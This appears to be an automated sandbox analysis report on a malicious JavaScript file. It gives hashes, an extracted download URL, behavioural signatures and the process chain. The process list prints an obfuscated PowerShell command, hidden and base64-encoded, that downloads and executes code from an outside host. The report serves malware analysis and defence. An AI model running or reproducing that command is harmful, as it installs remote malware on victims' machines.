Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
22/12/2023, 04:09
Static task
static1
Behavioral task
behavioral1
Sample
60c36da8d79f10579883b61cf32a995c.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
60c36da8d79f10579883b61cf32a995c.js
Resource
win10v2004-20231215-en
General
-
Target
60c36da8d79f10579883b61cf32a995c.js
-
Size
175KB
-
MD5
60c36da8d79f10579883b61cf32a995c
-
SHA1
ba1b52e9dbfc3079b1d4b7c5d40c7d23d56df276
-
SHA256
1d70b27434446bd1fe5192238088cc83c8fcc685feaf00b266052f751c1077f9
-
SHA512
dc5f2c5d91717d36ace6052d3e6f0a9bcf15f932c02e70870f5fb0eec5525e2c4b3579abf345fca9efb4f1406f00cf0f2e1e4974f6dcdd72c5e5a627e05a99b1
-
SSDEEP
3072:0kOBFat5SfZL1y0s09SBzb83XIIUwXSVhnBSfL822iwWmiwCm6Y5RP+Lj5pggfih:0kOBFat5zziRbYX2X7ffiDU+QrWkuyG/
Malware Config
Extracted
https://quickdrive.ae/js/JS000082510952000/dll/assistant.php
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2748 powershell.exe 7 2748 powershell.exe 9 2748 powershell.exe 12 2748 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2368 wrote to memory of 3056 2368 wscript.exe 30 PID 2368 wrote to memory of 3056 2368 wscript.exe 30 PID 2368 wrote to memory of 3056 2368 wscript.exe 30 PID 3056 wrote to memory of 2748 3056 cmd.exe 28 PID 3056 wrote to memory of 2748 3056 cmd.exe 28 PID 3056 wrote to memory of 2748 3056 cmd.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\60c36da8d79f10579883b61cf32a995c.js1⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBxAHUAaQBjAGsAZAByAGkAdgBlAC4AYQBlAC8AagBzAC8ASgBTADAAMAAwADAAOAAyADUAMQAwADkANQAyADAAMAAwAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBxAHUAaQBjAGsAZAByAGkAdgBlAC4AYQBlAC8AagBzAC8ASgBTADAAMAAwADAAOAAyADUAMQAwADkANQAyADAAMAAwAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748